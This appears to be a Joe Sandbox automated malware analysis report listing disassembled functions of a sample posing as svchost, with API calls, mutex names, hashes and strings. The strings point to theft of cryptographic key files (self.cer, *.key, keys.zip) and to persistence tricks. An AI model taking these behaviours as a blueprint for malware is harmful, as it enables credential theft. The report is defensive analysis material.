                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                              • String ID: 5DD2BD0Ba$5dd2bd8aa$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 2871222221-1995695911
                                                                                                                                                                                                              • Opcode ID: 62725fdf5eeb8ba2a3e47bc40511ee53caa8584116eda80584b1c56245e70950
                                                                                                                                                                                                              • Instruction ID: 745174ee79929c9db7e1840aa9d9f98417ccc6806d125aa16d3c86e429304b9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62725fdf5eeb8ba2a3e47bc40511ee53caa8584116eda80584b1c56245e70950
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD51C371A82711AFEF20AB709C0CF6B37ADAF85795F844B14F919DB180DB74D910CAA1
                                                                                                                                                                                                              Function 02CAC850 Relevance: 56.3, APIs: 25, Strings: 7, Instructions: 271fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAC86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAC8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC8F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 02CAC923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 02CAC936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 02CAC947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAC992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAC99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: A23C41FB$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 3980609930-3391077804
                                                                                                                                                                                                              • Opcode ID: 2e08d2a1f217b8c4356707c072d71cc47e0e5d15bef7550149fd31b5c0169b02
                                                                                                                                                                                                              • Instruction ID: 5d24d94c4678d07704828239a1d75a94f7addd481bf9d203b8f71fb115b4e544
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e08d2a1f217b8c4356707c072d71cc47e0e5d15bef7550149fd31b5c0169b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC917A30D8121A9FDB21DB74D868BEE7BE8BF89748F044596E94AD7240DB709B04CB90
                                                                                                                                                                                                              Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              Function 02CAEB30 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 223memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAEB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093), ref: 02CAEB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAEBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAEBC3
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAEBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAEBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAEBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAEC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAEC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?), ref: 02CAEC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CAECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAECAC
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02CAECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02CAED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02CAED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAEDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAEDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAEDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAEDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$a23c4093$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1472338570-4176102497
                                                                                                                                                                                                              • Opcode ID: f55dadcc47f390a4d74271d423e233301c1e4a5feddc7d0163dfa1746b0bbda8
                                                                                                                                                                                                              • Instruction ID: 01d6a2ffbb862a37625a9261cb7f969fa19f0b9d547f5213795a57046c70725b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f55dadcc47f390a4d74271d423e233301c1e4a5feddc7d0163dfa1746b0bbda8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7713A30D413569FDB218B34DC6CBEA7BE8AF86745F4486A4E989D7240DB70DA44CBD0
                                                                                                                                                                                                              Function 00402A70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7604DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 4049655197-3112416296
                                                                                                                                                                                                              • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              Function 02CA8350 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: 40fdfdb344cf135bf284accf5fd8a6d75ec0c74c7bfc1abe0fe54f567823fe97
                                                                                                                                                                                                              • Instruction ID: 13eabddbf32859ac7956d39ec59096ddc2f525dc1a56aded140d342c66d49031
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40fdfdb344cf135bf284accf5fd8a6d75ec0c74c7bfc1abe0fe54f567823fe97
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15D128B1A042425FC7218F3D8CB47B6BFF6AF86258B584769D889CB341E736DA09C750
                                                                                                                                                                                                              Function 00403699 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                              • API String ID: 3028510665-3770785300
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              Function 02CAC240 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 362COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C41FB$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 3912299499-868612816
                                                                                                                                                                                                              • Opcode ID: 3279e5d2f4b530634fe33d7322976353ad5b3d79dd8bfadd28dcb65fbfaa2354
                                                                                                                                                                                                              • Instruction ID: 60129887002b2fd3f3b0039815e94fe93d891c47d963ebd97ecf6f9169e43ed6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3279e5d2f4b530634fe33d7322976353ad5b3d79dd8bfadd28dcb65fbfaa2354
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E116B0D0125A9FCB11CFA8D950BEEBBF4AF49304F1486AAD989E7211E7309754CF90
                                                                                                                                                                                                              Function 02CB20D0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB20EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB212F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB2180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB218A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB21A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB21AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CB21E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CB21EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7,?,?), ref: 02CB2237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: a23c45b7$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1668326001-3461755649
                                                                                                                                                                                                              • Opcode ID: 2ca7b0dade074c9ecd6b1055c20df31385d4e2aaad4aee2f3736c93b31c09f71
                                                                                                                                                                                                              • Instruction ID: b1b74fa657f59ea2813a1b03a470c14afac4f8cdfd49afee4d167726d7ad3288
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca7b0dade074c9ecd6b1055c20df31385d4e2aaad4aee2f3736c93b31c09f71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08716831D403459FDB228B349C98BEB7BE8EF86341F544A94ED89D7240DB718A44CB92
                                                                                                                                                                                                              Function 02C9AAF0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: open$taskmgr
                                                                                                                                                                                                              • API String ID: 0-1543563666
                                                                                                                                                                                                              • Opcode ID: 1120edc397f4f1f664eda6828e20008ea0a3d8ba36f304bd949599f1d5ed9cde
                                                                                                                                                                                                              • Instruction ID: 1f518823225af7d66f8dbb2e6b95c3d585d961bcbb713663bf38e72a1546bf8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1120edc397f4f1f664eda6828e20008ea0a3d8ba36f304bd949599f1d5ed9cde
